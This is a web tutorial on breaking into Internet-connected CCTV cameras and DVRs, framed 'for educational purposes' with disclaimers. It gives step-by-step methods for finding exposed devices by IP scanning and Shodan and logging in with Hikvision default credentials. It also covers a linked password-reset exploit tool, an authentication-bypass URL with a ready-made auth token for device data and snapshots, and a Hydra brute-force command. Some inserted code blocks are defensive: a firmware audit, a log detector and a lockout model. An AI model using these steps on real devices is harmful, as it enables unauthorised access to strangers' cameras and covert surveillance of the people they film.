How to hack CCTV cameras (for educational purposes)

Want to learn how to hack CCTV cameras? You are in the right place, but be aware that I'm writing this article to let you know what is possible and how you must protect your IP cameras to keep them from being hacked.

DISCLAIMER: I'm not responsible for any of your acts. You are not supposed to hack CCTV cameras that don't belong to you. You've been warned.

OK, after this disclaimer, let's dive into the information about IP cameras and how they are hacked by malicious people on the Internet.

Hack CCTV camera

In this article I will explain step by step the methods hackers use to get into IP cameras and recorders such as DVRs and NVRs.

The methods to hack CCTV camera

There are different ways to hack a CCTV camera. Some of them are easy, others are a little more technical, and some are not even hacking.

Let's take a look at the following methods: 

1. Use a website that shows hacked CCTV cameras

This is not really hacking, but it's the easiest method. You just visit a website that lists a lot of hacked CCTV cameras and watch them.

Those websites are created by hackers who get into IP CCTV cameras or DVRs (Digital Video Recorders) and make the information available to you for free.

So, at the end of the day, you are not hacking anything but just watching CCTV cameras that have been hacked by somebody else.

See below an example of a website that shows such hacked CCTV cameras:

The website lists hacked CCTV cameras around the world and organizes them by manufacturer, country, place, city and time zone.

See below an example of live CCTV cameras installed in malls.

Hacked CCTV cameras on Insecam.org

The website administrator claims that this is the world's biggest directory of online surveillance security cameras and that the privacy of individuals will be respected by showing only filtered cameras (whatever this means).

According to a message on the main page, a CCTV camera can be removed from the site when somebody sends an email asking for it.

2. Hack CCTV camera using default passwords

That's also not really hacking, but it works. You just need to find the CCTV camera online and try the default password. A lot of devices on the Internet are still using the original password from the factory.

The idea is to look in the IP camera manual for the default password, so you can use it to hack the CCTV camera (or recorder).

How to find the IP camera on the Internet

OK, before you try the default password to hack a CCTV camera you need to find one on the Internet, and there are different ways to do that. Let's check the first method, which uses a network IP scanner to find online IP devices.

In this article I will teach you how to use the Angry IP Scanner to scan the Internet and look for IP cameras and recorders (DVRs and NVRs).

STEP 1 - Download the Angry IP Scanner

Click here to download the Angry IP Scanner for your operating system: Windows, Mac or Linux.

See below the Angry IP Scanner website. Make sure you have Java installed and download the correct version for your computer.

Install Angry IP Scanner to hack CCTV camera

STEP 2 - Install the Angry IP Scanner

The installation is very simple. You just need to run the setup file and follow the instructions as shown in the images below:

Angry IP Scanner Installation 01

Click Next

Angry IP Scanner Installation 02

Click Install

Angry IP Scanner Installation 03

Click Finish

STEP 3 - Configure the Angry IP Scanner ports and fetcher 

To find the information we need to hack IP cameras, it is necessary to configure the Angry IP Scanner ports and fetchers so it can display the right information. See the picture below for the configuration.

Angry IP Scanner Preference

Configure the ports 80, 23, 8080, 8081 and 8082, which are the ones most used by people who install IP cameras and leave them available on the Internet.

Angry IP Scanner Port Configuration to hack CCTV camera

Configure the fetchers to display the Web Detect information that will show some device information that is useful to find out who is the manufacturer.

To hack a CCTV camera it is really necessary to have such basic information.

Go to tools and click on fetchers to open the configuration window.

Angry IP Scanner fetchers

Select the Web detect fetcher on the right side and click the arrow to move it to the left side so it can be displayed in the software main page.

Angry IP Scanner Fetchers to hack CCTV camera

STEP 4 - Choose the IP address range to scan

To hack a CCTV camera it is first necessary to find one that is available on the Internet, so you need to choose an IP address range to scan with the Angry IP Scanner. See the picture below, where a range of IP addresses was scanned.

IP Angry Scanner Results for Hikvision DVRs

You can use the IP range from your country or service provider. In the example above I used the range from xx.242.10.0 to xx.242.10.255. Note that you can fill in the first part of the IP range and choose /24 or /16, for example, to let the software find the range for you with 254 or 65,534 hosts respectively.

For privacy reasons the first part of the IP is not shown. After only a few scans it's possible to find two Hikvision DVRs that are online on the Internet. I know that because of the Web detect information that shows DNVRS-Webs.

The scan can be done for thousands of IP addresses, so it's quite common to find a lot of IP cameras, DVRs and NVRs that are connected to the Internet.

After finding an IP camera or DVR online you just need to right-click and choose to open it in a web browser, just as shown in the picture below.

Angry IP Scanner Open in a Web Browser

In this case the device is a Hikvision DVR and you can just try the default user and password, "admin/12345", found in the Hikvision manual.

Hikvision DVR Login Screen

Note the manufacturer name (Hikvision) underneath the login screen. Sometimes you see a big logo and sometimes a small text just like this one.

Did you get the idea? To hack a CCTV camera you just need to use a tool to scan the Internet, find an online device and try the default password you can get from the manufacturer manual or from an IP camera default password list.

Below is the image from the DVR after logging in with the admin/12345 credentials.

Hikvision hacked DVR

It's easier to show an example with this manufacturer (Hikvision) because there are a lot of their devices around the world, but the process also works with other brands as long as you can see the Web Detect information and try the default admin/password credentials to hack the CCTV camera.

Hack CCTV camera process details

If you want extra information about how CCTV camera hacking works, just keep reading. It's important to understand the process so you can protect yourself against hackers trying to get into your IP security camera.

How CCTV camera hacking works (diagram)

The network scanner (Angry IP Scanner) is used to retrieve information from the router that is on the Internet, just as shown in the picture below:

How CCTV camera hacking works (diagram explanation)

Be aware that this process is natural: the router doesn't need to hide the information and will respond with the services that are available.

We can compare the process with a regular store: the owner doesn't hide where the store is located or what services are available, so people can come and use them. The owner just will not make the store key available to the public.

3. Hack CCTV camera using Shodan

This technique to hack a CCTV camera is very similar to the last one, but you don't need to install software to scan the network. This process has already been done for you and you just need to try the login credentials.

Shodan is a web service that shows Internet devices around the world, and that includes security IP cameras, DVRs and NVRs.

You just need to type the brand of an IP camera or the manufacturer name and Shodan will show you a lot of information, which includes the number of devices around the world, the location, IP and open ports.

Take a look at the picture below and see how much information is available.

Hack CCTV camera with Shodan

If you create a free account on the site, Shodan lets you filter the information. See below an example where the information is filtered by country (Brazil), and take a look at the details, which include the number of cameras per city (São Paulo) and even the ISP (Vivo).

Using Shodan to hack CCTV camera

Shodan shows the details about the IP device

To see the IP device details just click on the details link and a new window will open to show all the information about the CCTV camera you want to hack.

Shodan Details

Details about the device location and owner

The details window shows the device IP and even the organization name.

Shodan Device Details - IP and company

Details about the device ports

As we saw before, each IP device on the Internet has an IP and also some services available on specific ports. Shodan can show this information very clearly, as shown in the picture below.

Shodan Camera Details Port and Model

After seeing the details, you just need to type the device IP and port in a web browser and try the default user and password, just as described earlier in this article. See the picture below.

For this camera I just typed the IP and port like this: XX.226.219.250:88

DVR Login Screen

If you are lucky and the IP camera (or DVR) password has never been changed, you will be able to log in by typing the default device password.

4. Hack CCTV camera using exploit tool (software)

If you want to hack a CCTV camera but the default username and password were changed by somebody, you can use a CCTV camera exploit tool.

When an IP device has some security problem, hackers can create exploit tools to automate the hacking process. That happens also with IP cameras.

The Hikvision IP camera security flaw

In March 2017 a security flaw was discovered in Hikvision IP cameras that allows direct access to device information such as model, serial number, firmware version, and users.

The problem was reported to Hikvision on March 6, 2017, which promptly investigated the problem and admitted the existence of the failure.

Five days later Hikvision released a fix for the problem, but cameras that are using the old firmware will still be vulnerable to this security flaw.

How the IP camera exploit works

Just as an example I will talk about software created to exploit the security vulnerability in Hikvision IP cameras that are using specific old firmware.

Hikvision IP camera exploit tool diagram

The Hikvision IP camera exploit tool

So, the Hikvision IP camera exploit is very easy to use. As shown in the diagram above, you just need to run it on a computer or laptop to explore and hack a CCTV camera that is online on the Internet or in your local network.

Click the link below to download the Hikvision Backdoor exploit tool

Obviously, you need the IP camera information to be able to configure the software properly, and I strongly recommend that you use this tool on the Hikvision IP cameras you own or are authorized to run security tests on.

DISCLAIMER: I'm not responsible for any of your acts. You are not supposed to hack CCTV cameras that don't belong to you. The Hikvision exploit tool can be used to test your IP cameras and make sure they have the security vulnerability corrected by a firmware update. You've been warned.

OK, now that you know you are not supposed to be hacking other people's IP cameras, let's talk about the Hikvision exploit tool. See the picture below.

Hikvision IP camera exploit tool

The exploit can hack CCTV camera by getting the IP camera internal user list and setting a new password for one of them according to your choice.

To use the software just follow the steps below:

1. Type the camera IP and port

2. Click "get user list"

3. Select the user to change the password

4. Type a new password and click the button 

Hikvision exploit tool to hack CCTV camera

After following these steps, you just need to type the camera IP and port in a web browser and log in using the credential you just created.

Cameras that are affected by the security vulnerability

See below the Hikvision camera models that are affected by this security vulnerability. If you have one of them, just upgrade the firmware to correct the problem so you don't have your CCTV camera hacked.

Hikvision camera affected firmware

5. Hack CCTV camera using a simple command

How to get the IP camera information

It's also possible to hack a Hikvision camera by just sending a specific command that gets the camera information or takes a screenshot. The same models and firmware versions described above are affected by this issue.

If you type the camera IP and port followed by the command below you will see the camera details, such as device name, model and firmware version.

System/deviceInfo?auth=YWRtaW46MTEK

So the complete command is: 

<camera IP>:<camera port> System/deviceInfo?auth=YWRtaW46MTEK

The camera returns the information just like shown in the image below:

<DeviceInfo xmlns="http://www.hikvision.com/ver10/XMLSchema" version="1.0">
  <deviceName>IP CAMERA</deviceName>
  <deviceID>88</deviceID>
  <deviceDescription>IPCamera</deviceDescription>
  <deviceLocation>hangzhou</deviceLocation>
  <systemContact>Hikvision.China</systemContact>
  <model>DS-2CD2420F-IW</model>
  <serialNumber>DS-2CD2420F-IW20160920xxxxxxxxxx</serialNumber>
  <macAddress>a4:14:37:xx:xx:xx</macAddress>
  <firmwareVersion>V5.4.5</firmwareVersion>
  <firmwareReleasedDate>build 170123</firmwareReleasedDate>
  <bootVersion>V1.3.4</bootVersion>
  <bootReleasedDate>100316</bootReleasedDate>
  <hardwareVersion>0x0</hardwareVersion>
</DeviceInfo>
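The DeviceInfo document above is also what an inventory check on your own cameras has to parse. The following is an added example (not from the original article or from Hikvision) that reads such a document and flags firmware built before March 6, 2017, the report date given earlier, since a build older than the report cannot contain the fix. The sample document and the verdict names are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from datetime import date

NS = {"hik": "http://www.hikvision.com/ver10/XMLSchema"}
# Date the flaw was reported to the vendor, as stated in this article.
REPORTED = date(2017, 3, 6)

# Constructed sample, shaped like the DeviceInfo response shown above.
SAMPLE = """<DeviceInfo xmlns="http://www.hikvision.com/ver10/XMLSchema" version="1.0">
<deviceName>IP CAMERA</deviceName>
<model>DS-2CD2420F-IW</model>
<firmwareVersion>V5.4.5</firmwareVersion>
<firmwareReleasedDate>build 170123</firmwareReleasedDate>
</DeviceInfo>"""


def parse_build_date(text):
    """Turn 'build 170123' (YYMMDD) into a date; None if the field is malformed."""
    digits = text.replace("build", "").strip()
    if len(digits) != 6 or not digits.isdigit():
        return None
    try:
        return date(2000 + int(digits[:2]), int(digits[2:4]), int(digits[4:]))
    except ValueError:  # e.g. month 13
        return None


def audit_device_info(xml_text):
    """Return model, firmware, build date and a triage verdict for one device."""
    # Input is assumed to come from your own inventory export; for XML from
    # untrusted sources use a hardened parser such as defusedxml.
    root = ET.fromstring(xml_text)

    def field(name):
        return root.findtext(f"hik:{name}", default="", namespaces=NS).strip()

    built = parse_build_date(field("firmwareReleasedDate"))
    if built is None:
        verdict = "unknown-build"      # cannot decide, inspect by hand
    elif built < REPORTED:
        verdict = "predates-fix"       # built before the flaw was even reported
    else:
        verdict = "check-advisory"     # compare with the vendor's affected list
    return {"model": field("model"), "firmware": field("firmwareVersion"),
            "built": built, "verdict": verdict}


if __name__ == "__main__":
    print(audit_device_info(SAMPLE))
```

A "predates-fix" verdict only says the build is older than the report; whether the model is on the affected list still has to be confirmed against the vendor's advisory.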

How to take a camera screenshot

Just by issuing a similar command it's possible to take the IP camera screenshot and see what is behind the CCTV camera. It's a security flaw.

See below the command to get the IP camera screenshot.

onvif-http/snapshot?auth=YWRtaW46MTEK

So the complete command is: 

<camera IP>:<camera port> onvif-http/snapshot?auth=YWRtaW46MTEK

After issuing this command to the Hikvision IP camera, the image below is displayed in the web browser without the need for authentication.

Screenshot from a Hikvision IP camera

Disclaimer: The image above is from a Hikvision camera which was using an old firmware version as previously described in this article. The company has a fix for this issue so the new models don't have this security flaw.
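Both requests in this section leave the same trace: an `auth=` query parameter on the `System/deviceInfo` or `onvif-http/snapshot` path. The following is an added detection example (not part of the original article) that scans HTTP access logs for that pattern. The log format (combined-log style, from a reverse proxy or gateway in front of the cameras) and the log lines themselves are assumptions constructed for the demonstration.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

# Paths named in this article, matched case-insensitively to be conservative.
WATCHED = ("/system/deviceinfo", "/onvif-http/snapshot")
REQUEST = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed log lines using documentation IP ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/May/2017:10:01:02 +0000] "GET /System/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1" 200 812',
    '198.51.100.7 - - [12/May/2017:10:01:05 +0000] "GET /onvif-http/snapshot?auth=YWRtaW46MTEK HTTP/1.1" 200 48211',
    '192.0.2.10 - admin [12/May/2017:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 4410',
    '203.0.113.9 - - [12/May/2017:10:03:00 +0000] "GET /System/deviceInfo?auth=%%% HTTP/1.1" 401 0',
]


def decode_auth(value):
    """Base64-decode the auth parameter for the alert text; None if it is not valid Base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace").strip()
    except (binascii.Error, ValueError):
        return None


def find_auth_param_requests(lines):
    """Return one alert per request that puts an auth= parameter on a watched path."""
    alerts = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not an HTTP request line in the assumed format
        url = urlsplit(m["target"])
        params = parse_qs(url.query, keep_blank_values=True)
        if "auth" not in params or not url.path.lower().startswith(WATCHED):
            continue
        alerts.append({
            "src": m["src"],
            "path": url.path,
            "decoded": decode_auth(params["auth"][0]),
            # A 2xx status means the device answered: handle as an incident, not a probe.
            "served": m["status"].startswith("2"),
        })
    return alerts


if __name__ == "__main__":
    for alert in find_auth_param_requests(SAMPLE_LOG):
        print(alert)
```

Any alert with `served` set to true means a camera behind that gateway returned data to the request and should be taken off the Internet until its firmware is updated.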

6. Hack CCTV camera by brute force attack

Just imagine the CCTV camera is using a password based on a regular word that can be found in a dictionary, such as "god", "home", "secret", etc.

Somebody could hack the CCTV camera by just trying all those different passwords until finding the correct one. That is something that works.

Alright, you are now thinking that this method is too hard and slow, since it's complicated to type every word in a dictionary just to find the one that is going to work to log in to the CCTV camera, right?

Well, if you leave this task to software that can test hundreds or thousands of passwords per minute, you have a better chance to succeed.

Take a look at the diagram below to understand how this technique works.

Hack CCTV camera using Hydra for Linux

You can use Hydra for Linux or Windows. You just need to have your password file ready with the words you want to use and issue the command:

hydra -s 88 -l admin -P /root/desktop/pass.txt -e ns  <camera IP>

See below the syntax

-s 88 -- the port number on the IP camera
-l admin -- default login name that will be used (admin)
-P /root/desktop/pass.txt -- your password list file
-e ns -- extra checks: n tries an empty password, s tries the login name as the password

Hack CCTV camera using Hydra

The software runs and starts trying the different words it gets from the txt file, and keeps doing this until there's a match. If the CCTV camera allows those fast tries, it's just a question of time until the software finds the correct password.

Modern IP CCTV cameras don't allow this type of brute force attack because they block themselves for some time after too many login attempts. 
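The lockout behaviour described above can be modelled in a few lines to see how much it slows a dictionary run. This is an added illustration, not any vendor's firmware logic; the thresholds (5 failures within 300 seconds, 1800-second lockout) and the key format are assumed values.

```python
from collections import defaultdict


class LoginThrottle:
    """Temporary lockout after repeated failed logins, tracked per key."""

    def __init__(self, max_failures=5, window=300, lockout=1800):
        self.max_failures = max_failures  # failures tolerated inside the window
        self.window = window              # seconds over which failures are counted
        self.lockout = lockout            # seconds the key stays blocked
        self._failures = defaultdict(list)
        self._locked_until = {}

    def allowed(self, key, now):
        """True if a login attempt for this key would be evaluated at time now."""
        return now >= self._locked_until.get(key, 0)

    def record(self, key, now, success):
        """Register one attempt; False if it was refused or it triggered a lockout."""
        if not self.allowed(key, now):
            return False                  # refused without checking the password
        if success:
            self._failures.pop(key, None) # a good login clears the history
            return True
        recent = [t for t in self._failures[key] if now - t < self.window]
        recent.append(now)
        self._failures[key] = recent
        if len(recent) >= self.max_failures:
            self._locked_until[key] = now + self.lockout
            self._failures.pop(key, None)
            return False
        return True


def guesses_checked(throttle, key, attempts_per_second, duration):
    """Feed a steady stream of wrong passwords; count how many the device evaluates."""
    checked = 0
    for now in range(duration):           # one tick per second
        for _ in range(attempts_per_second):
            if throttle.allowed(key, now):
                checked += 1
                throttle.record(key, now, success=False)
    return checked


if __name__ == "__main__":
    key = ("198.51.100.7", "admin")       # constructed source address and user
    print(guesses_checked(LoginThrottle(), key, 10, 3600))
```

With these assumed values a source sending 10 guesses per second gets only 10 passwords evaluated in an hour, which is why a long, non-dictionary password combined with lockout makes the attack impractical.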

Final words and conclusion

There are different ways to hack a CCTV camera and all of them involve at least some basic skills from the attacker, who must understand at least a little about the Internet and how to use a computer and software.

Beware that any IP device that is connected to the Internet is at risk, and there's no guarantee that it's 100% secure and can't be hacked by someone.

The idea behind this article is to help people understand how a CCTV camera can be hacked and how to minimize an attacker's chances.

I used some examples just to show what is possible, and most of the techniques used by hackers can work with different devices.

Note: I'm not supporting any CCTV camera manufacturer or brand and I also don't recommend any attempt to hack into somebody else's camera.
